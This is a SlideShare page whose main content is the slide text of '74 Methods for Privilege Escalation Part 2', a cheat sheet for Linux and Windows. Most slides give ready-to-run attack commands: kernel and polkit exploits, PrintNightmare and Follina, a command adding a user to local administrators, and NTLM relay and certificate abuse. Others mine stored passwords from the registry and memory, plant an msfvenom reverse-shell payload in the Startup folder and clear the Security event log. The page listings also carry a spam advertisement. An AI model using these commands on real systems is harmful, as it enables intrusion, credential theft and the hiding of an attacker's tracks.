Windowsのパケットモニタ作成Windowsのパケットモニタ作成
Windowsのパケットモニタ作成
Shinichi Hirauchi
 
Openflow実験
Openflow実験Openflow実験
Openflow実験
Yahoo!デベロッパーネットワーク
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
Andy Lee
 
ゼロから学ぶIoTハンズオン資料
ゼロから学ぶIoTハンズオン資料ゼロから学ぶIoTハンズオン資料
ゼロから学ぶIoTハンズオン資料
Masaru Takahashi
 
OpenStack with OpenFlow
OpenStack with OpenFlowOpenStack with OpenFlow
OpenStack with OpenFlow
Toshiki Tsuboi
 
EC2でkeepalived+LVS(DSR)
EC2でkeepalived+LVS(DSR)EC2でkeepalived+LVS(DSR)
EC2でkeepalived+LVS(DSR)
Sugawara Genki
 
Happy Eyeballs v2 - RFC8305
Happy Eyeballs v2 - RFC8305Happy Eyeballs v2 - RFC8305
Happy Eyeballs v2 - RFC8305
APNIC
 
ビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアル
ビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアルビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアル
ビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアル
CRI Japan, Inc.
 
About 6lowpan wi-sun_ecl_20150116
About 6lowpan wi-sun_ecl_20150116About 6lowpan wi-sun_ecl_20150116
About 6lowpan wi-sun_ecl_20150116
Umeda Hidekazu
 
OVHcloud Hosted Private Cloud Platform Network use cases with VMware NSX
OVHcloud Hosted Private Cloud Platform Network use cases with VMware NSXOVHcloud Hosted Private Cloud Platform Network use cases with VMware NSX
OVHcloud Hosted Private Cloud Platform Network use cases with VMware NSX
OVHcloud
 
11 palo alto user-id concepts
11 palo alto user-id concepts11 palo alto user-id concepts
11 palo alto user-id concepts
Mostafa El Lathy
 
Vivado hls勉強会3(axi4 lite slave)
Vivado hls勉強会3(axi4 lite slave)Vivado hls勉強会3(axi4 lite slave)
Vivado hls勉強会3(axi4 lite slave)
marsee101
 
DevOpsにおけるAnsibleの立ち位置と使い所
DevOpsにおけるAnsibleの立ち位置と使い所DevOpsにおけるAnsibleの立ち位置と使い所
DevOpsにおけるAnsibleの立ち位置と使い所
Hidetoshi Hirokawa
 
PFSなTLS通信を復号する
PFSなTLS通信を復号するPFSなTLS通信を復号する
PFSなTLS通信を復号する
稔 小林
 
OpenStack超入門シリーズ いまさら聞けないNeutronの使い方
OpenStack超入門シリーズ いまさら聞けないNeutronの使い方OpenStack超入門シリーズ いまさら聞けないNeutronの使い方
OpenStack超入門シリーズ いまさら聞けないNeutronの使い方
Toru Makabe
 
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
VirtualTech Japan Inc.
 
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
ShapeBlue
 
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
Hadess
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
OlehLevytskyi1
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
Apcera
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
webuploader
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
nayakslideshare
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
Adeel Javaid
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 

More Related Content

What's hot

EC2でkeepalived+LVS(DSR)
EC2でkeepalived+LVS(DSR)EC2でkeepalived+LVS(DSR)
EC2でkeepalived+LVS(DSR)
Sugawara Genki
 
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
VirtualTech Japan Inc.
 
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
ShapeBlue
 

What's hot (12)

EC2でkeepalived+LVS(DSR)
EC2でkeepalived+LVS(DSR)EC2でkeepalived+LVS(DSR)
EC2でkeepalived+LVS(DSR)
 
Happy Eyeballs v2 - RFC8305
Happy Eyeballs v2 - RFC8305Happy Eyeballs v2 - RFC8305
Happy Eyeballs v2 - RFC8305
 
ビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアル
ビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアルビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアル
ビルトインサーバーLoRaWANゲートウェイ LPS8v2日本語ユーザーマニュアル
 
About 6lowpan wi-sun_ecl_20150116
About 6lowpan wi-sun_ecl_20150116About 6lowpan wi-sun_ecl_20150116
About 6lowpan wi-sun_ecl_20150116
 
OVHcloud Hosted Private Cloud Platform Network use cases with VMware NSX
OVHcloud Hosted Private Cloud Platform Network use cases with VMware NSXOVHcloud Hosted Private Cloud Platform Network use cases with VMware NSX
OVHcloud Hosted Private Cloud Platform Network use cases with VMware NSX
 
11 palo alto user-id concepts
11 palo alto user-id concepts11 palo alto user-id concepts
11 palo alto user-id concepts
 
Vivado hls勉強会3(axi4 lite slave)
Vivado hls勉強会3(axi4 lite slave)Vivado hls勉強会3(axi4 lite slave)
Vivado hls勉強会3(axi4 lite slave)
 
DevOpsにおけるAnsibleの立ち位置と使い所
DevOpsにおけるAnsibleの立ち位置と使い所DevOpsにおけるAnsibleの立ち位置と使い所
DevOpsにおけるAnsibleの立ち位置と使い所
 
PFSなTLS通信を復号する
PFSなTLS通信を復号するPFSなTLS通信を復号する
PFSなTLS通信を復号する
 
OpenStack超入門シリーズ いまさら聞けないNeutronの使い方
OpenStack超入門シリーズ いまさら聞けないNeutronの使い方OpenStack超入門シリーズ いまさら聞けないNeutronの使い方
OpenStack超入門シリーズ いまさら聞けないNeutronの使い方
 
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
「Neutronになって理解するOpenStack Network」~Neutron/Open vSwitchなどNeutronと周辺技術の解説~ - ...
 
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
 

Similar to 74 Methods for Privilege Escalation Part 2

40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
Hadess
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
webuploader
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 

Similar to 74 Methods for Privilege Escalation Part 2 (20)

40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 

Recently uploaded

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
 

Recently uploaded (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 

74 Methods for Privilege Escalation Part 2

  • 1. 74 METHODS FOR PRIVILEGE ESCALATION PART 2 HADESS | SECURE AGILE DEVELOPMENT WWW.HADESS.IO
  • 2. NO Y/N Yes NO NO NO Y/N Y/N N N N YES YES YES Y/N YES YES YES NO NO Y/N NO Y/N YES No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 1 Abusing Sudo Binaries 2 Abusing Scheduled Tasks 3 Golden Ticket With Scheduled Tasks 4 Abusing Interpreter Capabilities 5 Abusing Binary Capabilities 6 Abusing ActiveSessions Capabilities 7 Escalate with TRUSTWORTHY in SQL Server 8 Abusing Mysql run as root No Method DOMAIN APT 9 Abusing journalctl 10 Abusing VDS 11 Abusing Browser 12 Abusing LDAP 13 LLMNR Poisoning 14 Abusing Certificate Services 15 MySQL UDF Code Injection 16 Impersonation Token with ImpersonateLoggedOnuser No Method DOMAIN APT 17 Impersonation Token with SeImpersontePrivilege 18 Impersonation Token with SeLoadDriverPrivilege 19 OpenVPN Credentials 20 Bash History 21 Package Capture 22 NFS Root Squashing 23 Abusing Access Control List 24 Escalate With SeBackupPrivilege
  • 3. No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 25 Escalate With SeImpersonatePrivilege YES 26 Escalate With SeLoadDriverPrivilege YES 27 Escalate With ForceChangePassword YES 28 Escalate With GenericWrite YES 29 Abusing GPO YES 30 Pass-the-Ticket YES 31 Golden Ticket YES 32 Abusing Splunk Universal Forwarder NO No Method DOMAIN APT 33 Abusing Gdbus Y/N 34 Abusing Trusted DC YES 35 NTLM Relay YES 36 Exchange Relay YES 37 Dumping with diskshadow YES 38 Dumping with vssadmin YES 39 Password Spraying Y/N 40 AS-REP Roasting YES
  • 5. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit gcc -pthread c0w.c -o c0w; ./c0w; passwd; id DIRTYC0W HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 6. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit CVE-2016-1531.sh;id CVE-2016-1531 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 7. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege- Esclation poc.sh POLKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 8. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./traitor-amd64 --exploit kernel:CVE-2022-0847 Whoami;id DIRTYPIPE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 9. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./cve-2021-4034 Whoami;id PWNKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 10. Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit msf > use exploit/windows/local/ms14_058_track_popup_menu msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id > msf exploit(ms14_058_track_popup_menu) > exploit MS14_058 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 11. Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit In command prompt type: powershell.exe -nop -ep bypass In Power Shell prompt type: Import-Module C:UsersUserDesktopToolsTaterTater.ps1 In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add" To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators HOT POTATO HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 12. Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit execute -H -f sysret.exe -a "-pid [pid]” INTEL SYSRET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 13. Domain: Yes Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/outflanknl/PrintNightmare PrintNightmare 10.10.10.10 exp.dll PRINTNIGHTMARE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 14. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/JohnHammond/msdt-follina python3 follina.py -c "notepad" FOLINA HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 15. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/riparino/Task_Scheduler_ALPC ALPC HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 16. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user .RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1 REMOTEPOTATO0 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 17. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show CVE-2022-26923 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 18. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841- 771695929-1514560438-1103 -d dc-a-2003.dom-a.loc MS14-068 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 19. Domain: No Local Admin: Yes OS: Linux Type: Enumeration & Hunt ps -ef | grep ftp; gdp -p ftp_id info proc mappings q dump memory /tmp/mem [start] [end] q strings /tmp/mem | grep passw PASSWORD MINING IN MEMORY(LINUX) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 20. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d 1 2. 3. PASSWORD MINING IN MEMORY(WINDOWS) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 21. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Open command and type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultUsername In command prompt type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultPassword Notice the credentials, from the output. In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyUsername In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyPassword In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v Password In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v PasswordViewOnly Make note of the encrypted passwords and type: C:UsersUserDesktopToolsvncpwdvncpwd.exe [Encrypted Password] From the output, make note of the credentials. 1. 2. 3. 4. 5. 6. Notice the credentials, from the output. 7. 8. 9. 10. PASSWORD MINING IN REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 22. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 Or PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 23. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 wevtutil cl Security Or PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 24. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe Place x.exe in “C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup”. 1. 2. STARTUP APPLICATIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 25. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe McAfeeSitelistFiles PASSWORD MINING IN MCAFEESITELISTFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 26. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe CachedGPPPassword PASSWORD MINING IN CACHEDGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 27. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe DomainGPPPassword PASSWORD MINING IN DOMAINGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 28. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe keepass KeeTheft.exe Or PASSWORD MINING IN KEEPASS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 29. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe WindowsVault PASSWORD MINING IN WINDOWSVAULT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 30. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe SecPackageCreds PASSWORD MINING IN SECPACKAGECREDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 31. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe PuttyHostKeys PASSWORD MINING IN PUTTYHOSTKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 32. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDCManFiles PASSWORD MINING IN RDCMANFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
